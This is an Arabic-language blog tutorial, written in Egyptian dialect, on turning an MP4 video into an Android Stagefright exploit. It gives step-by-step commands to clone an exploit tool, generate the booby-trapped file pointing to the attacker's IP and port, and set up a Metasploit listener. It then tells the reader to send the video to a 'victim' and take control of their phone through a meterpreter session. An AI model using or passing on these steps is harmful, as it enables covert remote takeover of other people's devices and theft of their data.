الطريقه 3 وهي عبر بايلود فيديو (mp4)
ولاكن هنحتاج اداة جديده لصنع الفيديو الملغم
اول حاجه هتكتب امر تثبيت الاداة
git clone https://github.com/fireworm0/Exploit-Android-Stagefright
امر فتح الأداة بعد تثبيتها
cd Exploit-Android-Stagefright
نكتب امر تلغيم الملف
python2 mp4.py -c (اكتب ip الخارجي بتاعك) -p البورت
زاآإۍ كده هتكتبها بالشكل دﮪ
python2 mp4.py -c 101.0.245.37 -p 8080
ملحوظة قلبوظه: ينصح بالبورت 8080
بعدها ندخل للميتاسبلويت طبعا لازم تكون مثبتها من الاول
امر فتح الميتاسبلويت
msfconsole
بعدها تكتب الاوامر الجاية
set payload android/browser/stagefright_mp4_tx3g_64b
set lhost (اكتب الايبي الخاص بك)
هتكون بالشكل دﮪ
set lhost 45.82.72.101
بعدها البورت
set lport 8080
exploit
بعدها هتلاقي الفيديو في الذاكره الداخليه هتبعته للضحية وتستناه يثبتو
تستنا لغايه ميفتح الفيديو وهتكتب كلمه meterpreter وهنا تقدر تتحكم في جهازو وجميع اوامر التحكم في الضحية اكتب help وهتظهر الاوامر
ليست هناك تعليقات:
إرسال تعليق